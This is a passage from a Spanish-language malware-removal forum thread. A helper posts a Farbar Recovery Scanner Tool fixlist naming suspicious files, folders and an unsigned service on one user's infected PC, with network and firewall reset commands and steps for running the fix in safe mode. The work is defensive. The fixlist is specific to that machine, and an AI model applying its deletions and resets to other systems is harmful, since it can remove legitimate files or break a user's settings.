CHR Extension: (Chrome Media Router) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-09-01]
CHR HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [npiecjlhkngdinoeekmccdbjdgclmnbk] - C:\Users\MrEidrian\AppData\Local\CRE\npiecjlhkngdinoeekmccdbjdgclmnbk.crx <no encontrado>
OPR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01]
OPR Extension: (SaveFrom.net helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\npdpplbicnmpoigidfdjadamgfkilaak [2019-09-01]
R2 EventSvc; C:\ProgramData\EventSvc\eventsvc.exe [360448 2018-07-24] (CloudBees, Inc.) [Archivo no firmado] <==== ATENCIÓN
2020-01-31 11:11 - 2020-01-31 11:11 - 000000000 ____D C:\ProgramData\S536BIPQ4TQ114GHW03YTCXG2
2020-01-31 11:10 - 2020-01-31 11:10 - 003061248 _____ C:\Users\MrEidrian\AppData\LocalLow\ELQnRq0YvJ.exe
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\vntlutefrev
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\vfbtqr24hkh
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Program Files\NJ4SOTTRZH
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Program Files\AUXDGUNQ0L
2020-01-17 12:07 - 2020-01-17 12:07 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\x4sjscyv4hq
2020-01-17 12:07 - 2020-01-17 12:07 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\uhnrjry4bdn
2020-01-17 12:07 - 2020-01-17 12:07 - 000000000 ____D C:\Program Files\U5EES31B4Q
2020-01-17 12:07 - 2020-01-17 12:07 - 000000000 ____D C:\Program Files\85E8BNNBEE
2020-01-17 12:02 - 2020-01-17 12:02 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\4plii4obowa
2020-01-17 12:02 - 2020-01-17 12:02 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\2j3xhwl5gqf
2020-01-17 12:02 - 2020-01-17 12:02 - 000000000 ____D C:\Program Files\ZWD63K22V7
2020-01-17 12:02 - 2020-01-17 12:02 - 000000000 ____D C:\Program Files\NPUOW5G9P5
2020-01-17 11:57 - 2020-01-17 11:57 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\mprw3ktcc2k
2020-01-17 11:57 - 2020-01-17 11:57 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\hi4mbly3ii3
2020-01-17 11:57 - 2020-01-17 11:57 - 000000000 ____D C:\Program Files\U24HP4O5BP
2020-01-17 11:57 - 2020-01-17 11:57 - 000000000 ____D C:\Program Files\ERTC7W5OYX
2020-01-17 11:52 - 2020-01-17 11:52 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\kdua1jfo123
2020-01-17 11:52 - 2020-01-17 11:52 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\g2dncbivjiz
2020-01-17 11:52 - 2020-01-17 11:52 - 000000000 ____D C:\Program Files\9B24IF9AQM
2020-01-17 11:52 - 2020-01-17 11:52 - 000000000 ____D C:\Program Files\6S3KYHHWIU
2020-01-17 11:40 - 2020-01-17 11:40 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\n0pczckdhog
2020-01-17 11:40 - 2020-01-17 11:40 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\a5cqdmrbe54
2020-01-17 11:40 - 2020-01-17 11:40 - 000000000 ____D C:\Program Files\YUGF9ZIQK7
2020-01-17 11:40 - 2020-01-17 11:40 - 000000000 ____D C:\Program Files\WAK3MKKWFC
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\frr3pwvyetd
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\dia1nwsj1y1
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Program Files\KHJ98BRLDV
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Program Files\0OP808P0KJ
2019-09-01 09:14 - 2019-09-01 09:14 - 000265728 _____ () C:\Users\MrEidrian\3272741.exe
2019-09-01 09:14 - 2019-09-01 09:14 - 000265728 _____ () C:\Users\MrEidrian\4131620.exe
2019-09-01 09:54 - 2019-09-01 09:54 - 000265728 _____ () C:\Users\MrEidrian\4411038.exe
2019-09-01 09:54 - 2019-09-01 09:54 - 000265728 _____ () C:\Users\MrEidrian\5111029.exe
2020-01-31 11:10 - 2020-01-31 11:10 - 000723968 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-007J5.tmp\oswlgg15f1h.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-1801B.tmp\251zwfb1una.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-27APO.tmp\emdwzefyk2y.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-3RUQC.tmp\0pbpdqr0a5k.tmp
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-3TFQG.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-6BAIV.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-9SBJV.tmp\itdownload.dll
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-AGTBR.tmp\xpvfw24cqky.tmp
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-AJVC4.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-BLKKH.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-BLKKI.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-CD8CM.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-CJT48.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-FAB73.tmp\itdownload.dll
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-GHA5E.tmp\0xyemshxszc.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-HQODJ.tmp\sbatxjutel4.tmp
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-HRQMA.tmp\itdownload.dll
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I1NTH.tmp\sqhrsfjrtyk.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000723968 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I2K7L.tmp\30rwyhw2iwt.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I4PTQ.tmp\vkfgpve1kmf.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-LVUEI.tmp\pvtkqi5q5e2.tmp
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-NSE98.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-O6NNI.tmp\itdownload.dll
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-QLBVR.tmp\vvegzej4wy2.tmp
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-RGEG7.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-RLT00.tmp\itdownload.dll
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-SDRGI.tmp\jujerzwizaa.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-T0S8A.tmp\i4loeahzfup.tmp

HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END

Guárdalo bajo el nombre de FIXLIST.TXT en el escritorio :arrow_backward: Esto es muy importante.

:o: Nota :o: Es importante que la herramienta FRST.exe (Farbar Recovery Scanner Tool) y FIXLIST.TXT se encuentren en la misma ubicación (escritorio) o si no, no trabajara.


Y ahora inicia en modo seguro para trabajar desde ese modo de windows.

  • Ejecuta FRST.exe.(Si usas Windows Vista/7/8 o 10, presiona clic derecho y seleccionas -Ejecutar como Administrador-).
  • Presionar el botón FIX y aguardar a que termine.
  • La Herramienta guardara el reporte de reparación en el escritorio (FIXLOG.TXT).

Pega el contenido de este fichero en tu próxima respuesta.

Reiniciar el equipo y comprobar su funcionamiento en relación al problema planteado y comentarlo.

Un saludo

19

Oks lo probaré hoy lo más seguro. Pero encendido no está pq salen muchísimas ventanas no deja usarlo con normalidad y después de lo que me pasó con PayPal me da miedo.

20

Hola

Realizaste el último paso que te indiqué?

Un saludo